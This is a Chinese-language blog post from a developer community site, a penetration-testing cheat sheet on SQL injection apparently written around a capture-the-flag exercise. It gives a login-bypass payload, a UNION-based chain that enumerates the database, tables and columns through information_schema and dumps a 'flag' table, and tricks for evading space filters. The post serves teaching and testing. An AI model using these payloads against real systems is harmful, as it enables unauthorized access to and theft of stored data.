前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试 --SQL注入

渗透测试 --SQL注入

作者头像
曈曈too
发布2023-11-17 21:24:03
1530
发布2023-11-17 21:24:03
举报

SQL注入

万能密码

代码语言:javascript
复制
'or 1 = 1 #

联合查询注入

代码语言:javascript
复制
# 获取返回的字段位置

'union select 1,2,3------ # ? ?--查看回显确定

# 获取当前数据库名字,以第二个为回显为例

'union  select  1,database(),3; # --回显'web2'

# 查看数据库中的表名

'union select 1,table_name,3 from information_schema.tables where table_schema =database(); # ? ?--回显flag,user

# 查看flag表中的列名

'union  select  1,column_name,3  from information_schema.columns where table_name ='flag';# ? ?--回显flag

# 拿到flag

'union select 1,flag,3 from flag;#

PS:

mysqlinformation_schema库中记录了其它数据库的结构

? tables记录了数据表和数据库的关系 ? columns记录了数据表和列的关系

database():输出当前数据库名

group_concat():可将多行数据查询结果返回为一行字符串

代码语言:javascript
复制
select * from 表对象 where [条件]

知道数据库名称:web2

如何获得web2的所有数据表?

代码语言:javascript
复制
select table_name from information_schema.tables where table_schema =database();

突破字符替换

为了防御sql注入,有的开发者直接简单、暴力的将selectfrom等关键字替换或匹配拦截

  1. 只过滤了空格:

%0a%0b%0c%0d%09%a(均为url编码,%a0在特定字符集才能利用)和/**/组合、括号等

文章目录

#SQL注入 #渗透测试 #WEB安全

版权属于:瞳瞳too

本文链接:/developer/article/2360139

本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!

本文参与?腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-11-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客?前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com